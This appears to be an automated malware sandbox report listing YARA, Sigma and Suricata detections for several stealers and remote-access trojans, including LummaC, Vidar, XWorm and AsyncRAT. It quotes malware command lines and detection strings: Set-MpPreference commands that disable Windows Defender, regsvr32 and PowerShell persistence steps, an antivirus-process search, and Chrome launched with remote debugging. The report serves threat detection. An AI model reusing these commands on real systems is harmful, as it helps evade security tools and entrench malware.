Process Memory Space: BitLockerToGo.exe PID: 3332	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3332	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 714ab8b5fd.exe PID: 7092	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 714ab8b5fd.exe PID: 7092	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 714ab8b5fd.exe PID: 7092	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: crossplatformplayer.exe PID: 4856	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
Process Memory Space: regsvr32.exe PID: 6264	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: regsvr32.exe PID: 6264	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 56 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
42.2.regsvr32.exe.1b910000.3.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x509d:$s6: Set-MpPreference -MAPSReporting 0 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x5422:$e2: Add-MpPreference -ExclusionPath
20.2.Appeal.com.4fa0000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
20.2.Appeal.com.4fa0000.1.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x19deb:$str01: MachineID: 0x18d4f:$str02: Work Dir: In memory 0x19e93:$str03: [Hardware] 0x19dd4:$str04: VideoCard: 0x194fa:$str05: [Processes] 0x19506:$str06: [Software] 0x18de0:$str07: information.txt 0x19aec:$str08: %s\* 0x19b39:$str08: %s\* 0x18ffd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x193cc:$str12: UseMasterPassword 0x19e9f:$str13: Soft: WinSCP 0x198a5:$str14: <Pass encoding="base64"> 0x19e82:$str15: Soft: FileZilla 0x18dd2:$str16: passwords.txt 0x193f7:$str17: build_id 0x194be:$str18: file_data
42.2.regsvr32.exe.1b910000.3.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x329d:$s6: Set-MpPreference -MAPSReporting 0 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x3622:$e2: Add-MpPreference -ExclusionPath
42.2.regsvr32.exe.ababde.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
42.2.regsvr32.exe.ababde.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
42.2.regsvr32.exe.ababde.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5902:$str01: $VB$Local_Port 0x58f3:$str02: $VB$Local_Host 0x5bb1:$str03: get_Jpeg 0x5649:$str04: get_ServicePack 0x6a77:$str05: Select * from AntivirusProduct 0x6c75:$str06: PCRestart 0x6c89:$str07: shutdown.exe /f /r /t 0 0x6d3b:$str08: StopReport 0x6d11:$str09: StopDDos 0x6e07:$str10: sendPlugin 0x6fa5:$str12: -ExecutionPolicy Bypass -File " 0x70ca:$str13: Content-length: 5235
42.2.regsvr32.exe.ababde.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6987:$s6: VirtualBox 0x68e5:$s8: Win32_ComputerSystem 0x7489:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7526:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x763b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fe5:$cnc4: POST / HTTP/1.1
6.2.skotes.exe.610000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
42.2.regsvr32.exe.2530000.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
42.2.regsvr32.exe.2530000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
42.2.regsvr32.exe.2530000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
42.2.regsvr32.exe.2530000.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
42.2.regsvr32.exe.2530000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
42.2.regsvr32.exe.256131e.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
42.2.regsvr32.exe.256131e.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
42.2.regsvr32.exe.256131e.2.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5902:$str01: $VB$Local_Port 0x58f3:$str02: $VB$Local_Host 0x5bb1:$str03: get_Jpeg 0x5649:$str04: get_ServicePack 0x6a77:$str05: Select * from AntivirusProduct 0x6c75:$str06: PCRestart 0x6c89:$str07: shutdown.exe /f /r /t 0 0x6d3b:$str08: StopReport 0x6d11:$str09: StopDDos 0x6e07:$str10: sendPlugin 0x6fa5:$str12: -ExecutionPolicy Bypass -File " 0x70ca:$str13: Content-length: 5235
42.2.regsvr32.exe.256131e.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6987:$s6: VirtualBox 0x68e5:$s8: Win32_ComputerSystem 0x7489:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7526:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x763b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fe5:$cnc4: POST / HTTP/1.1
1.2.skotes.exe.610000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
42.2.regsvr32.exe.ababde.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
42.2.regsvr32.exe.ababde.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
42.2.regsvr32.exe.ababde.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
42.2.regsvr32.exe.ababde.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
42.2.regsvr32.exe.ababde.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
42.2.regsvr32.exe.2530000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
42.2.regsvr32.exe.2530000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
42.2.regsvr32.exe.2530000.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5902:$str01: $VB$Local_Port 0x58f3:$str02: $VB$Local_Host 0x5bb1:$str03: get_Jpeg 0x5649:$str04: get_ServicePack 0x6a77:$str05: Select * from AntivirusProduct 0x6c75:$str06: PCRestart 0x6c89:$str07: shutdown.exe /f /r /t 0 0x6d3b:$str08: StopReport 0x6d11:$str09: StopDDos 0x6e07:$str10: sendPlugin 0x6fa5:$str12: -ExecutionPolicy Bypass -File " 0x70ca:$str13: Content-length: 5235
42.2.regsvr32.exe.2530000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6987:$s6: VirtualBox 0x68e5:$s8: Win32_ComputerSystem 0x7489:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7526:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x763b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fe5:$cnc4: POST / HTTP/1.1
42.2.regsvr32.exe.256131e.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
42.2.regsvr32.exe.256131e.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
42.2.regsvr32.exe.256131e.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
42.2.regsvr32.exe.256131e.2.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
42.2.regsvr32.exe.256131e.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
22.0.2328527160.exe.ac0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.2E02vIiMfd.exe.a20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.2328527160.exe.3f19550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
22.2.2328527160.exe.3f19550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.skotes.exe.610000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 33 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\regsvr32.exe, ProcessId: 6264, TargetFilename: C:\Users\user\AppData\Local\dllhost.exe

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Source: Process started

Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6264, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6312, ProcessName: powershell.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Appeal.com j, ParentImage: C:\Users\user\AppData\Local\Temp\567757\Appeal.com, ParentProcessId: 4340, ParentProcessName: Appeal.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6792, ProcessName: chrome.exe

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\regsvr32.exe, ProcessId: 6264, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1hcwmhj.wy0.ps1

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp" /SL5="$30440,1104885,161792,C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp, ParentProcessId: 4812, ParentProcessName: ac911b4662.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ProcessId: 2852, ProcessName: regsvr32.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe, ParentProcessId: 2832, ParentProcessName: d1d4560504.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd, ProcessId: 6768, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6264, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6312, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6984, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6264, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6312, ProcessName: powershell.exe

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6768, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2368, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:27:30.484368+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.76.27	443	TCP
2025-01-26T15:27:31.838871+0100	2028371	3	Unknown Traffic	192.168.2.4	49749	104.21.76.27	443	TCP
2025-01-26T15:27:33.409532+0100	2028371	3	Unknown Traffic	192.168.2.4	49762	104.21.76.27	443	TCP
2025-01-26T15:27:46.665677+0100	2028371	3	Unknown Traffic	192.168.2.4	49843	104.21.76.27	443	TCP
2025-01-26T15:27:48.018506+0100	2028371	3	Unknown Traffic	192.168.2.4	49852	104.21.76.27	443	TCP
2025-01-26T15:28:01.016655+0100	2028371	3	Unknown Traffic	192.168.2.4	49920	104.21.76.27	443	TCP
2025-01-26T15:28:04.521654+0100	2028371	3	Unknown Traffic	192.168.2.4	59823	104.21.29.142	443	TCP
2025-01-26T15:28:05.473246+0100	2028371	3	Unknown Traffic	192.168.2.4	59827	104.102.49.254	443	TCP
2025-01-26T15:28:06.829998+0100	2028371	3	Unknown Traffic	192.168.2.4	59836	104.21.76.27	443	TCP
2025-01-26T15:28:06.832345+0100	2028371	3	Unknown Traffic	192.168.2.4	59835	104.21.82.94	443	TCP
2025-01-26T15:28:08.110524+0100	2028371	3	Unknown Traffic	192.168.2.4	59842	104.21.29.142	443	TCP
2025-01-26T15:28:08.634943+0100	2028371	3	Unknown Traffic	192.168.2.4	59848	104.21.82.94	443	TCP
2025-01-26T15:28:11.539264+0100	2028371	3	Unknown Traffic	192.168.2.4	59861	104.21.76.27	443	TCP
2025-01-26T15:28:14.099846+0100	2028371	3	Unknown Traffic	192.168.2.4	59709	104.21.29.142	443	TCP
2025-01-26T15:28:14.756516+0100	2028371	3	Unknown Traffic	192.168.2.4	59712	104.21.82.94	443	TCP
2025-01-26T15:28:14.859123+0100	2028371	3	Unknown Traffic	192.168.2.4	59710	104.102.49.254	443	TCP
2025-01-26T15:28:16.292900+0100	2028371	3	Unknown Traffic	192.168.2.4	59722	104.21.82.94	443	TCP
2025-01-26T15:28:17.172387+0100	2028371	3	Unknown Traffic	192.168.2.4	59730	104.21.29.142	443	TCP
2025-01-26T15:28:17.246409+0100	2028371	3	Unknown Traffic	192.168.2.4	59731	104.21.82.94	443	TCP
2025-01-26T15:28:17.632107+0100	2028371	3	Unknown Traffic	192.168.2.4	59738	104.21.82.94	443	TCP
2025-01-26T15:28:19.397832+0100	2028371	3	Unknown Traffic	192.168.2.4	59750	104.21.82.94	443	TCP
2025-01-26T15:28:19.428593+0100	2028371	3	Unknown Traffic	192.168.2.4	59751	104.21.29.142	443	TCP
2025-01-26T15:28:19.701446+0100	2028371	3	Unknown Traffic	192.168.2.4	59753	104.21.82.94	443	TCP
2025-01-26T15:28:23.324322+0100	2028371	3	Unknown Traffic	192.168.2.4	59777	104.21.82.94	443	TCP
2025-01-26T15:28:26.652815+0100	2028371	3	Unknown Traffic	192.168.2.4	59782	104.21.29.142	443	TCP
2025-01-26T15:28:26.655791+0100	2028371	3	Unknown Traffic	192.168.2.4	59781	104.21.82.94	443	TCP
2025-01-26T15:28:28.569094+0100	2028371	3	Unknown Traffic	192.168.2.4	59784	104.21.82.94	443	TCP
2025-01-26T15:28:33.610076+0100	2028371	3	Unknown Traffic	192.168.2.4	59796	104.21.29.142	443	TCP
2025-01-26T15:28:35.048302+0100	2028371	3	Unknown Traffic	192.168.2.4	59801	104.21.82.94	443	TCP
2025-01-26T15:28:39.350977+0100	2028371	3	Unknown Traffic	192.168.2.4	59817	104.21.82.94	443	TCP
2025-01-26T15:28:43.415069+0100	2028371	3	Unknown Traffic	192.168.2.4	59824	104.102.49.254	443	TCP
2025-01-26T15:28:43.698504+0100	2028371	3	Unknown Traffic	192.168.2.4	59825	104.21.29.142	443	TCP
2025-01-26T15:28:43.865567+0100	2028371	3	Unknown Traffic	192.168.2.4	59827	104.21.82.94	443	TCP
2025-01-26T15:28:56.966643+0100	2028371	3	Unknown Traffic	192.168.2.4	59836	104.21.82.94	443	TCP
2025-01-26T15:28:59.923952+0100	2028371	3	Unknown Traffic	192.168.2.4	59837	104.21.82.94	443	TCP

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:29:12.862015+0100	2028765	3	Unknown Traffic	192.168.2.4	59842	176.113.115.96	443	TCP
2025-01-26T15:29:17.359711+0100	2028765	3	Unknown Traffic	192.168.2.4	59848	176.113.115.96	443	TCP
2025-01-26T15:29:20.187754+0100	2028765	3	Unknown Traffic	192.168.2.4	59856	176.113.115.96	443	TCP
2025-01-26T15:29:21.751765+0100	2028765	3	Unknown Traffic	192.168.2.4	59858	176.113.115.96	443	TCP
2025-01-26T15:29:23.359084+0100	2028765	3	Unknown Traffic	192.168.2.4	59862	176.113.115.96	443	TCP
2025-01-26T15:29:24.767468+0100	2028765	3	Unknown Traffic	192.168.2.4	59866	176.113.115.96	443	TCP
